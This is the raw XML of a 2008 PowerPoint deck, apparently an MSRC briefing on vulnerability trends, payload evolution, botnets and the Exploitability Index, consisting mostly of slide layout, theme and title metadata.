                <a:endParaRPr lang="en-US" sz="2300" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30" name="Rounded Rectangle 29"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5455594" y="2115715"/>
                <a:ext cx="1172583" cy="2086983"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:alpha val="58000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:ln>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="none" w="med" len="med"/>
              </a:ln>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lIns="91436" tIns="45718" rIns="91436" bIns="45718" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" defTabSz="914099">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="2300" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="000000">
                        <a:alpha val="43137"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="20" name="Straight Arrow Connector 19"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3491345" y="4655127"/>
                <a:ext cx="4976421" cy="7434"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75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rot="16200000">
                <a:off x="1843902" y="3129693"/>
                <a:ext cx="2825069" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="95000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="000000">
                          <a:alpha val="43137"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>Number of Vulnerabilities</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="2132907" y="3284018"/>
                <a:ext cx="2741427" cy="793"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75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rot="16200000">
                <a:off x="2889931" y="3231118"/>
                <a:ext cx="2825069" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:cs typeface="Arial" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="31" name="TextBox 30"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7049489" y="2384210"/>
                <a:ext cx="1894609" cy="338554"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0">
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>1H07</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="33" name="Straight Connector 32"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="10800000" flipV="1">
                <a:off x="6078681" y="2600986"/>
                <a:ext cx="970808" cy="499961"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="44450" cap="rnd">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:prstDash val="sysDot"/>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5474519" y="4655130"/>
                <a:ext cx="2018805" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr>
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" dirty="0">
                    <a:effectLst>
                      <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                        <a:srgbClr val="000000">
                          <a:alpha val="43137"/>
                        </a:srgbClr>
                      </a:outerShdw>
                    </a:effectLst>
                    <a:latin typeface="Arial" charset="0"/>
                    <a:cs typeface="Arial" charset="0"/>
                  </a:rPr>
                  <a:t>Time</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3715001" y="3222625"/>
                <a:ext cx="3920837" cy="147987"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="37465">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:headEnd type="oval" w="med" len="med"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Arc 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16428956">
              <a:off x="4928716" y="965946"/>
              <a:ext cx="5075686" cy="7555903"/>
            </a:xfrm>
            <a:prstGeom prst="arc">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="34925">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:headEnd type="oval"/>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grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fade/>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86.2|.5|.5|.5|.5|33|.5|.5|.5|.5"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Security Intelligence Report Briefing">
  <a:themeElements>
    <a:clrScheme name="Blue Template-Template">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="050595"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFF99"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="FFC000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="3497AE"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="DF8045"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="7DCC2E"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FF9929"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="7D3DA1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="F3EB4F"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="7DDDFF"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Trebuchet - Trebuchet">
      <a:majorFont>
        <a:latin typeface="Trebuchet MS"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Trebuchet MS"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>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1"/>
        </a:solidFill>
        <a:ln>
          <a:headEnd type="none" w="med" len="med"/>
          <a:tailEnd type="none" w="med" len="med"/>
        </a:ln>
        <a:scene3d>
          <a:camera prst="orthographicFront" fov="0">
            <a:rot lat="0" lon="0" rev="0"/>
          </a:camera>
          <a:lightRig rig="glow" dir="t">
            <a:rot lat="0" lon="0" rev="6360000"/>
          </a:lightRig>
        </a:scene3d>
        <a:sp3d prstMaterial="flat">
          <a:contourClr>
            <a:schemeClr val="accent2">
              <a:satMod val="300000"/>
            </a:schemeClr>
          </a:contourClr>
        </a:sp3d>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300" dirty="0" smtClean="0">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:effectLst>
              <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                <a:srgbClr val="000000">
                  <a:alpha val="43137"/>
                </a:srgbClr>
              </a:outerShdw>
            </a:effectLst>
            <a:latin typeface="Trebuchet MS" pitchFamily="34" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
      <a:style>
        <a:lnRef idx="0">
          <a:schemeClr val="accent2"/>
        </a:lnRef>
        <a:fillRef idx="3">
          <a:schemeClr val="accent2"/>
        </a:fillRef>
        <a:effectRef idx="3">
          <a:schemeClr val="accent2"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </a:style>
    </a:spDef>
    <a:txDef>
      <a:spPr>
        <a:noFill/>
      </a:spPr>
      <a:bodyPr wrap="none" rtlCol="0">
        <a:spAutoFit/>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr algn="ctr">
          <a:defRPr dirty="0" smtClean="0">
            <a:latin typeface="+mn-lt"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:txDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst/>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="White with Courier font for code slides">
  <a:themeElements>
    <a:clrScheme name="Blue Template-Template">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="050595"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFFFFF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="FFC000"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="3497AE"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="DF8045"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="7DCC2E"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FF9929"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="7D3DA1"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="F3EB4F"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="7DDDFF"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="Blue-Purple TT">
      <a:majorFont>
        <a:latin typeface="Segoe"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Segoe"/>
        <a:ea typeface=""/>
        <a:cs typeface=""/>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109728" tIns="54864" rIns="109728" bIns="54864" numCol="1" rtlCol="0" anchor="ctr" anchorCtr="0" compatLnSpc="1">
        <a:prstTxWarp prst="textNoShape">
          <a:avLst/>
        </a:prstTxWarp>
      </a:bodyPr>
      <a:lstStyle>
        <a:defPPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="1096963" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1">
          <a:lnSpc>
            <a:spcPct val="100000"/>
          </a:lnSpc>
          <a:spcBef>
            <a:spcPct val="0"/>
          </a:spcBef>
          <a:spcAft>
            <a:spcPct val="0"/>
          </a:spcAft>
          <a:buClrTx/>
          <a:buSzTx/>
          <a:buFontTx/>
          <a:buNone/>
          <a:tabLst/>
          <a:defRPr kumimoji="0"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defRPr>
        </a:defPPr>
      </a:lstStyle>
      <a:style>
        <a:lnRef idx="0">
          <a:schemeClr val="accent2"/>
        </a:lnRef>
        <a:fillRef idx="3">
          <a:schemeClr val="accent2"/>
        </a:fillRef>
        <a:effectRef idx="3">
          <a:schemeClr val="accent2"/>
        </a:effectRef>
        <a:fontRef idx="minor">
          <a:schemeClr val="lt1"/>
        </a:fontRef>
      </a:style>
    </a:sp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0000"/>
                <a:satMod val="155000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="65000">
              <a:schemeClr val="phClr">
                <a:shade val="85000"/>
                <a:satMod val="155000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:shade val="95000"/>
                <a:satMod val="155000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="16200000" scaled="0"/>
        </a:gradFill>
      </a:fillStyleLst>
      <a:lnStyleLst>
        <a:ln w="6350" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="phClr">
              <a:shade val="95000"/>
              <a:satMod val="105000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:ln w="25400" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="phClr"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
        <a:ln w="34925" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="phClr"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
        </a:ln>
      </a:lnStyleLst>
      <a:effectStyleLst>
        <a:effectStyle>
          <a:effectLst>
            <a:outerShdw blurRad="50800" algn="tl" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="64000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </a:effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:outerShdw blurRad="39000" dist="25400" dir="5400000">
              <a:srgbClr val="000000">
                <a:alpha val="35000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </a:effectStyle>
        <a:effectStyle>
          <a:effectLst>
            <a:outerShdw blurRad="39000" dist="25400" dir="5400000">
              <a:srgbClr val="000000">
                <a:alpha val="35000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
          <a:scene3d>
            <a:camera prst="orthographicFront" fov="0">
              <a:rot lat="0" lon="0" rev="0"/>
            </a:camera>
            <a:lightRig rig="threePt" dir="t">
              <a:rot lat="0" lon="0" rev="0"/>
            </a:lightRig>
          </a:scene3d>
          <a:sp3d prstMaterial="matte">
            <a:bevelT h="22225"/>
          </a:sp3d>
        </a:effectStyle>
      </a:effectStyleLst>
      <a:bgFillStyleLst>
        <a:solidFill>
          <a:schemeClr val="phClr"/>
        </a:solidFill>
        <a:gradFill rotWithShape="1">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="phClr">
                <a:shade val="50000"/>
                <a:satMod val="155000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="35000">
              <a:schemeClr val="phClr">
                <a:shade val="75000"/>
                <a:satMod val="155000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="phClr">
                <a:tint val="80000"/>
                <a:satMod val="255000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="16200000" scaled="0"/>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2345</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>623</Paragraphs>
  <Slides>48</Slides>
  <Notes>48</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>48</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="50" baseType="lpstr">
      <vt:lpstr>Security Intelligence Report Briefing</vt:lpstr>
      <vt:lpstr>White with Courier font for code slides</vt:lpstr>
      <vt:lpstr>Evolution of the Ecosystem (and of the MSRC with 3 new strategic programs to rock your world)</vt:lpstr>
      <vt:lpstr>Sound off Who am I?               Steve Adegbite</vt:lpstr>
      <vt:lpstr>Intro – Why Am I Here?  </vt:lpstr>
      <vt:lpstr>Agenda </vt:lpstr>
      <vt:lpstr>Security Ecosystem Trends</vt:lpstr>
      <vt:lpstr>Security Ecosystem Trends</vt:lpstr>
      <vt:lpstr>Vulnerability Reports  Year-over-year increase</vt:lpstr>
      <vt:lpstr>Vulnerability Reports Comparative trends </vt:lpstr>
      <vt:lpstr>Microsoft Vulnerability Exploit Details Trends </vt:lpstr>
      <vt:lpstr>Security Ecosystem Trends  Horizontal Integration  </vt:lpstr>
      <vt:lpstr>Security Economic Trends</vt:lpstr>
      <vt:lpstr>Security Economy Characteristics</vt:lpstr>
      <vt:lpstr>Auction </vt:lpstr>
      <vt:lpstr>Direct sale ?</vt:lpstr>
      <vt:lpstr>Business Start-up – HuPigon</vt:lpstr>
      <vt:lpstr>MSRC Role &amp; View of the Ecosystem</vt:lpstr>
      <vt:lpstr>MSRC Role</vt:lpstr>
      <vt:lpstr>The TWC Memo</vt:lpstr>
      <vt:lpstr>Security Development Lifecycle Industry Leading Security Engineering</vt:lpstr>
      <vt:lpstr>Security Response Process</vt:lpstr>
      <vt:lpstr>Slide 21</vt:lpstr>
      <vt:lpstr>MSRC Today</vt:lpstr>
      <vt:lpstr>MSRC Activities</vt:lpstr>
      <vt:lpstr>Meeting places</vt:lpstr>
      <vt:lpstr>Slide 25</vt:lpstr>
      <vt:lpstr>Security Threat Evolution</vt:lpstr>
      <vt:lpstr>Payload Evolution </vt:lpstr>
      <vt:lpstr>Web Site Defacements</vt:lpstr>
      <vt:lpstr>Payload Evolution </vt:lpstr>
      <vt:lpstr>"Playful Payloads"</vt:lpstr>
      <vt:lpstr>Payload Evolution </vt:lpstr>
      <vt:lpstr>Botnets Have No Borders… </vt:lpstr>
      <vt:lpstr>http://ijk.cc/E/J.JS</vt:lpstr>
      <vt:lpstr>Payload Evolution </vt:lpstr>
      <vt:lpstr>The Era of Purpose</vt:lpstr>
      <vt:lpstr>MSRC Evolution</vt:lpstr>
      <vt:lpstr>Call To Action – 2007</vt:lpstr>
      <vt:lpstr>MSRC Evolution</vt:lpstr>
      <vt:lpstr>Slide 39</vt:lpstr>
      <vt:lpstr>Slide 40</vt:lpstr>
      <vt:lpstr>Security Cooperation Program - CERTs </vt:lpstr>
      <vt:lpstr>Exploitability Index</vt:lpstr>
      <vt:lpstr>Slide 43</vt:lpstr>
      <vt:lpstr>Understanding the Index</vt:lpstr>
      <vt:lpstr>Microsoft Vulnerability Research</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Resources</vt:lpstr>
      <vt:lpstr>Slide 48</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dc:description/>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2008-11-10T11:10:13Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2008-11-10T11:10:47Z</dcterms:modified>
</cp:coreProperties>
</file>